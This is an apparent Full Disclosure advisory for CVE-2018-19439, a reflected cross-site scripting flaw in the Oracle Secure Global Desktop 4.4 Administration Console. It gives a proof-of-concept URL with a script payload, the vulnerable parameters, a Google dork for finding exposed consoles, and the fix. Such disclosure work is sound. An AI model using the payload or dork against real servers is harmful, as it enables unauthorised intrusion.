CVE-2018-19439 - Cross Site Scripting in Oracle Secure Global Desktop Administration Console - 4.4; Build: 20080807152602

Related Vulnerabilities: CVE-2018-19439  
                							

            <!--
# Exploit Title: Cross Site Scripting in Oracle Secure Global Desktop
Administration Console - 4.4; Build: 20080807152602
# Date: 22-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: <a rel="nofollow" href="http://www.oracle.com/">http://www.oracle.com/</a>
# Software Link: <a rel="nofollow" href="http://www.oracle.com/">http://www.oracle.com/</a>
# Version: Oracle Secure Global Desktop Administration Console - 4.4;
Build: 20080807152602
# Tested on: all
# CVE : CVE-2018-19439
# Category: webapps

1. Description

Cross Site Scripting exists in the Administration Console in Oracle Secure
Global Desktop 4.4 20080807152602. The page "helpwindow.jsp" has reflected
XSS via all parameters.


2. Proof of Concept

<a rel="nofollow" href="http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&amp;windowTitle=AdministratorHelp">http://X.X.X.X/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&amp;windowTitle=AdministratorHelp</a>
Window&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;body&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;&lt;!--&amp;
<p>Help&amp;mastheadUrl=/images/productNameSecondaryMasthead.png&amp;mastheadDescription=Sun
Secure Global Desktop
Administration&amp;jspPath=/sgdadmin/faces/com_sun_web_ui/help/&amp;mastheadHeight=40&amp;mastheadWidth=20

Vulnerables parameters:
windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription,
jspPath, mastheadHeight and mastheadWidth.

Google dorks:
inurl:"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"


3. Solution:

Update to the latests version Oracle Secure Global Desktop Administration
Console 5.4.

--&gt;

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>

<p>